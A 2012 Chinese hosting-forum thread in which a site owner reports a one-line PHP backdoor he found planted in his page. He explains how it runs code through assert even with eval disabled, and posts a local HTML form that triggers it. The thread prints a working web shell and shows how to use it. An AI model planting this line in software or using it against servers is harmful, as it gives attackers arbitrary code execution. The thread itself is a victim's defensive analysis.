全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 6906|回复: 55
打印 上一主题 下一主题

某人在我一个页面里留下了这个

  [复制链接]
1#
发表于 2012-2-16 21:02:54 | 只看该作者
标志下
2#
 楼主| 发表于 2012-2-16 15:13:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本帖最后由 miniloop 于 2012-2-16 17:42 编辑

莫名奇妙就负载奇高,默默地查了一晚上,发现某人在一个php页面里留下了这个
  1. @ $_GET['page']($_POST['item']);
复制代码
这不就是传说中的一句话后门么?

======================================
编辑for更新


黑阔厉害啊,尼玛查半天终于知道他是怎样搞的了。
由于我装系统的时候就禁用了eval,他不可能用,网上查了半天知道了
assert也可以直接执行php代码。
现在在本机模拟了下。

建一个post.html
  1. <form action = "test.php?page=assert" method = "post">
  2.    <input type = "text" name = "item" />
  3.     <input type = "submit" value = "运行" />
  4.    </form>
复制代码
复制代码
再建一个test.php
  1. <?php $_GET['page']($_POST['item']);  ?>
复制代码
复制代码
这个post.html在任何电脑上运行都可以,只要action的地址是那个test.php.

在输入框里输入: phpinfo(); 点击运行按钮,
尼玛 phpinfo就直接出来啦,太可怕了,这可以为所欲为了啊

dfdfdf.gif (5.61 KB, 下载次数: 3)
dfdfdfttt.gif (12.51 KB, 下载次数: 0)

评分

参与人数 2威望 +6 收起 理由
jones + 1 我擦,这也可以。但你咋往别人服务器上传这.
edear + 5 很给力!

查看全部评分

3#
发表于 2012-2-16 15:14:32 | 只看该作者
本帖最后由 zyzit 于 2012-2-16 15:14 编辑

我不会这个  没学过PHP
4#
发表于 2012-2-16 15:14:44 | 只看该作者
看不懂
5#
发表于 2012-2-16 15:14:55 | 只看该作者
不懂
6#
发表于 2012-2-16 15:19:30 | 只看该作者
7#
 楼主| 发表于 2012-2-16 15:25:44 | 只看该作者
如果 page = eval 的话,那item就可以是任何php语句了。
但是我已经禁止了eval的啊,他怎么还能执行php呢
8#
发表于 2012-2-16 15:26:16 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
9#
发表于 2012-2-16 15:29:55 | 只看该作者
类似
10#
发表于 2012-2-16 15:34:17 | 只看该作者
是一句话后门
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-11-7 08:54 , Processed in 0.082856 second(s), 16 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表